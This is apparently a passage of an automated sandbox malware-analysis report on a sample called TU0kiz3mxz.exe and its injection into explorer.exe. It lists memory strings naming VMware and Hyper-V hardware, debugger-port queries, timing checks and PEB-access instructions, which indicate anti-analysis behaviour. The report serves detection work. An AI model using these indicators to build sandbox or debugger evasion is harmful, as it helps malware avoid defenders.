          Source: explorer.exe, 00000004.00000000.1712729060.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2633149369.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1712729060.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687494902.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3921428061.000000000971D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.000000000978C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2822574462.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3936575958.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2699789410.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2805244746.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2700813787.000000000978C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJq
          Source: explorer.exe, 0000000F.00000003.2966717817.000000000CBB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@
          Source: explorer.exe, 0000000F.00000003.2966717817.000000000CBB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000004.00000000.1712729060.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000004.00000000.1712729060.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
          Source: explorer.exe, 0000000F.00000003.2805244746.000000000973B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
          Source: explorer.exe, 0000000F.00000002.4176411814.000000000CA05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\>
          Source: explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000004.00000000.1712729060.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: TU0kiz3mxz.exe, 00000000.00000002.1710158521.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: TyGc8VmCIO
          Source: explorer.exe, 0000000F.00000002.4159088871.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
          Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 0000000F.00000003.2765565439.000000000CDF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}x
          Source: explorer.exe, 0000000F.00000003.2767588418.000000000CD3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.2630983803.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000000.1712729060.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 0000000F.00000003.3928151394.000000000CAB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0040ACE0 LdrLoadDll,3_2_0040ACE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_004A79E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_004A79E1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01180115 mov eax, dword ptr fs:[00000030h]3_2_01180115
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116A118 mov ecx, dword ptr fs:[00000030h]3_2_0116A118
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h]3_2_0116A118
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h]3_2_0116A118
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116A118 mov eax, dword ptr fs:[00000030h]3_2_0116A118
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov eax, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E10E mov ecx, dword ptr fs:[00000030h]3_2_0116E10E
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F0124 mov eax, dword ptr fs:[00000030h]3_2_010F0124
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01158158 mov eax, dword ptr fs:[00000030h]3_2_01158158
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01154144 mov ecx, dword ptr fs:[00000030h]3_2_01154144
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01154144 mov eax, dword ptr fs:[00000030h]3_2_01154144
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6154 mov eax, dword ptr fs:[00000030h]3_2_010C6154
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6154 mov eax, dword ptr fs:[00000030h]3_2_010C6154
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC156 mov eax, dword ptr fs:[00000030h]3_2_010BC156
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114019F mov eax, dword ptr fs:[00000030h]3_2_0114019F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01100185 mov eax, dword ptr fs:[00000030h]3_2_01100185
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01164180 mov eax, dword ptr fs:[00000030h]3_2_01164180
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01164180 mov eax, dword ptr fs:[00000030h]3_2_01164180
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h]3_2_010BA197
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h]3_2_010BA197
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA197 mov eax, dword ptr fs:[00000030h]3_2_010BA197
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117C188 mov eax, dword ptr fs:[00000030h]3_2_0117C188
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117C188 mov eax, dword ptr fs:[00000030h]3_2_0117C188
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0113E1D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113E1D0 mov eax, dword ptr fs:[00000030h]3_2_0113E1D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011861C3 mov eax, dword ptr fs:[00000030h]3_2_011861C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011861C3 mov eax, dword ptr fs:[00000030h]3_2_011861C3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F01F8 mov eax, dword ptr fs:[00000030h]3_2_010F01F8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011961E5 mov eax, dword ptr fs:[00000030h]3_2_011961E5
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01144000 mov ecx, dword ptr fs:[00000030h]3_2_01144000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01162000 mov eax, dword ptr fs:[00000030h]3_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE016 mov eax, dword ptr fs:[00000030h]3_2_010DE016
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01156030 mov eax, dword ptr fs:[00000030h]3_2_01156030
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA020 mov eax, dword ptr fs:[00000030h]3_2_010BA020
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC020 mov eax, dword ptr fs:[00000030h]3_2_010BC020
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01146050 mov eax, dword ptr fs:[00000030h]3_2_01146050
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2050 mov eax, dword ptr fs:[00000030h]3_2_010C2050
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EC073 mov eax, dword ptr fs:[00000030h]3_2_010EC073
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C208A mov eax, dword ptr fs:[00000030h]3_2_010C208A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011860B8 mov eax, dword ptr fs:[00000030h]3_2_011860B8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011860B8 mov ecx, dword ptr fs:[00000030h]3_2_011860B8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011580A8 mov eax, dword ptr fs:[00000030h]3_2_011580A8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011420DE mov eax, dword ptr fs:[00000030h]3_2_011420DE
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011020F0 mov ecx, dword ptr fs:[00000030h]3_2_011020F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C80E9 mov eax, dword ptr fs:[00000030h]3_2_010C80E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]3_2_010BA0E3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011460E0 mov eax, dword ptr fs:[00000030h]3_2_011460E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC0F0 mov eax, dword ptr fs:[00000030h]3_2_010BC0F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FA30B mov eax, dword ptr fs:[00000030h]3_2_010FA30B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BC310 mov ecx, dword ptr fs:[00000030h]3_2_010BC310
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E0310 mov ecx, dword ptr fs:[00000030h]3_2_010E0310
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01168350 mov ecx, dword ptr fs:[00000030h]3_2_01168350
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov ecx, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114035C mov eax, dword ptr fs:[00000030h]3_2_0114035C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118A352 mov eax, dword ptr fs:[00000030h]3_2_0118A352
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01142349 mov eax, dword ptr fs:[00000030h]3_2_01142349
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116437C mov eax, dword ptr fs:[00000030h]3_2_0116437C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E438F mov eax, dword ptr fs:[00000030h]3_2_010E438F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E438F mov eax, dword ptr fs:[00000030h]3_2_010E438F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BE388 mov eax, dword ptr fs:[00000030h]3_2_010BE388
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B8397 mov eax, dword ptr fs:[00000030h]3_2_010B8397
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011643D4 mov eax, dword ptr fs:[00000030h]3_2_011643D4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011643D4 mov eax, dword ptr fs:[00000030h]3_2_011643D4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CA3C0 mov eax, dword ptr fs:[00000030h]3_2_010CA3C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C83C0 mov eax, dword ptr fs:[00000030h]3_2_010C83C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov ecx, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116E3DB mov eax, dword ptr fs:[00000030h]3_2_0116E3DB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011463C0 mov eax, dword ptr fs:[00000030h]3_2_011463C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117C3CD mov eax, dword ptr fs:[00000030h]3_2_0117C3CD
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D03E9 mov eax, dword ptr fs:[00000030h]3_2_010D03E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F63FF mov eax, dword ptr fs:[00000030h]3_2_010F63FF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F0 mov eax, dword ptr fs:[00000030h]3_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B823B mov eax, dword ptr fs:[00000030h]3_2_010B823B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A250 mov eax, dword ptr fs:[00000030h]3_2_0117A250
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117A250 mov eax, dword ptr fs:[00000030h]3_2_0117A250
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C6259 mov eax, dword ptr fs:[00000030h]3_2_010C6259
